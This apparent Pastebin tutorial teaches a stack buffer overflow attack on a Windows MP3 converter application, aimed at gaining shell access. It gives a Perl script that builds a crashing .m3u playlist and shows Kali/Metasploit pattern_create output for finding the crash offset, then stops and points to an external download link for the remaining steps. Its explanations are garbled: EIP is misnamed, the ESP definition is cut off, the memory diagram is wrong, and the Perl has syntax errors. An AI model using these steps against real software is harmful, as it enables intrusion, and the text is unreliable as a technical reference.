API tools faq
paste
Advertisement
rajeshmjmdrhack

Stacked based Buffer-Overflow

rajeshmjmdrhack
Sep 17th, 2015
142
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 8.21 KB | None | 0 0
raw download clone embed print report
  1. Buffer Overflow
  2. ---------------------------------------------------
  3.  
  4. By - @rajeshmjmdrhack
  5.  
  6. Buffer :- Temporary Memory
  7.  
  8. In this attack we gonna overflow the temporary memory of an application to exploit our shell and get the shell access.
  9.  
  10. ____________________
  11. | ___|_______ Application
  12. | __________ |
  13. | | Reg. | |
  14. | | Memory | |
  15. | | Space | |
  16. EIP ________|___|__________| | ____
  17. | |__________| | |_ Temporary Memory. (Buffer)
  18. ESP ________|___|__________| | ____|
  19. | | Harddisk| |
  20. | | Space | |
  21. | |__________| |
  22. |____________________|
  23.  
  24. EIP - Extended Index Pointer.
  25. ESP - Extended
  26.  
  27. Through this figure we can estimate that there is a registered memory for an application which it will use during functioning. And if somehow it get's full then there is something known as Temporary Memory. So now you can understand what actually we have to do in this attack.
  28.  
  29. _______________________________
  30. | |
  31. | Requirements |
  32. |_______________________________|
  33.  
  34. 1. Windbg (Can be downloaded from Internet).
  35. 2. Kali linux.
  36. 3. Windows.
  37. 4. Victim app.(Here I am using RM to MP3 converter).
  38. 5. Parde for Perl IDE. (Can be downloaded from Internet).
  39. _______________________________
  40. | |
  41. | Rough Idea |
  42. |_______________________________|
  43.  
  44. Step 1. We will first overflow its temp. memory as per the attack says.
  45. Step 2. Then we will know where the EIP & ESP of the app. is. So that we could forward the error to our exploit's address.
  46. Step 3. We will exploit our shell and get the shell access.
  47.  
  48. _______________________________
  49. | |
  50. | Steps |
  51. |_______________________________|
  52.  
  53. Step 1 - First of all download all the required apps. and i am gonna overflow RM to MP3 converter here.
  54.  
  55. Step 2 - Start up your windows engine.
  56.  
  57. Step 3 - First of all we have to find the vulnerability in this app. one by one and here we found that the vulnerability in this app is in during loading the playlist files. (i.e. m3u files etc.)
  58.  
  59. Step 4 - So here we gonna create a perl file that will automaticaly creates a m3u file having our code.
  60. ____________________________________________________________________________________
  61. | |
  62. | #!usr/bin/perl |
  63. | my $file = "crash.m3u" |
  64. | my $junk = "A" x 10000; |
  65. | open($FILE,">$file"); |
  66. | print $FILE "$junk"; |
  67. | close($FILE); |
  68. | print "m3u File Created successfully\n"; |
  69. | |
  70. |____________________________________________________________________________________|
  71.  
  72. Step 5 - Install Padre for Perl IDE and the save this file as crash.pl
  73.  
  74. Step 6 - Run this perl file. It will creates a crash.m3u file.
  75.  
  76. Step 7 - You will get an error saying that this file is unreadable AAAAAAAAA........]
  77. (It means that the application can read this file and guess that it's an error. So this means it is not overflowing now.)
  78.  
  79. Step 8 - So now we gonna change the no of A's in our crash.m3u file. To do that we gonna edit the .pl file in the 3rd line i.e. my $junk="A" x 10000 to my $junk="A" x 20000 . Or we will until
  80. buffer gets overflowing. Here in this app it starts overflowing in 30000.
  81.  
  82. Step 9 - But now the problem is we have to on which no. of A the application starts crashing. Because after we gonna write our malicious code.
  83.  
  84. Step 10 - Now we have two choices either we check every 30000 A's in the crash.m3u, which is I think impossible. So here kali linux comes in view.
  85.  
  86. Step 11 - Now start up your kali engine. It has some tools that will help us to find where our application is going to crash.
  87.  
  88. Step 12 - In kali linux there is something known as metasploit. So we gonna browse our terminal to the metasploit folder.
  89.  
  90. ___________________________________________________________________
  91. |root@kali:~# cd /usr/share/metasploit-framework/tools |
  92. |root@kali:/usr/share/metasploit-framework/tools# ls |
  93. |committer_count.rb memdump msf_irb_shell.rb |
  94. |context metasm_shell.rb msftidy.rb |
  95. |convert_31.rb missing-payload-tests.rb nasm_shell.rb |
  96. |cpassword_decrypt.rb module_author.rb [pattern_create.rb]|
  97. |dev module_changelog.rb [pattern_offset.rb]|
  98. |exe2vba.rb module_commits.rb payload_lengths.rb |
  99. |exe2vbs.rb module_count.rb pdf2xdp.rb |
  100. |find_badchars.rb module_disclodate.rb profile.sh |
  101. |halflm_second.rb module_license.rb psexec.rb |
  102. |hmac_sha1_crack.rb module_mixins.rb reg.rb |
  103. |import_webscarab.rb module_payloads.rb verify_datastore.rb|
  104. |java_deserializer.rb module_ports.rb virustotal.rb |
  105. |list_interfaces.rb module_rank.rb vxdigger.rb |
  106. |lm2ntcrack.rb module_reference.rb vxencrypt.rb |
  107. |makeiplist.rb module_targets.rb vxmaster.rb |
  108. |root@kali:/usr/share/metasploit-framework/tools#./pattern_create.rb|
  109. |5000 |
  110. |___________________________________________________________________|
  111.  
  112. Here, you can see that i have highlighted two tools one is pattern_create.rb. Which we will use to create different types of pattern. And the other one is pattern_offset.rb which we will use where actually our application is crashing.
  113.  
  114. After executing our command i.e. ./pattern_create.rb 5000. It will create 5000 words of different patterns. So here we will edit our .pl file. Here I edited like this.
  115.  
  116. ____________________________________________________________________________________
  117. | |
  118. | #!usr/bin/perl |
  119. | my $file = "crash.m3u" |
  120. | my $junk = "A" x 25000; |
  121. | my $junk1 = "5000 random pattern created by kali" |
  122. | open($FILE,">$file"); |
  123. | print $FILE "$junk"."$junk1"; |
  124. | close($FILE); |
  125. | print "m3u File Created successfully\n"; |
  126. | |
  127. |____________________________________________________________________________________|
  128.  
  129. Step 13 - Now we gonna again gonna load this .m3u in RM to MP3 converter. This time we will get an error offset of some number and this is the hex number of anyone of the alphabet in the random pattern.
  130. Now again, there is a problem either we will search for the hex number for all the alphabets in our pattern and search for the correct pattern and get to know where actually our application is start crashing.
  131. So here again we'll use our kali engine.
  132.  
  133. Here we will use our next tool i.e. pattern_offset.rb.
  134.  
  135. So, And further is in this pdf file download it and read it.
  136. http://www15.zippyshare.com/v/gekd9Lnk/file.html
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!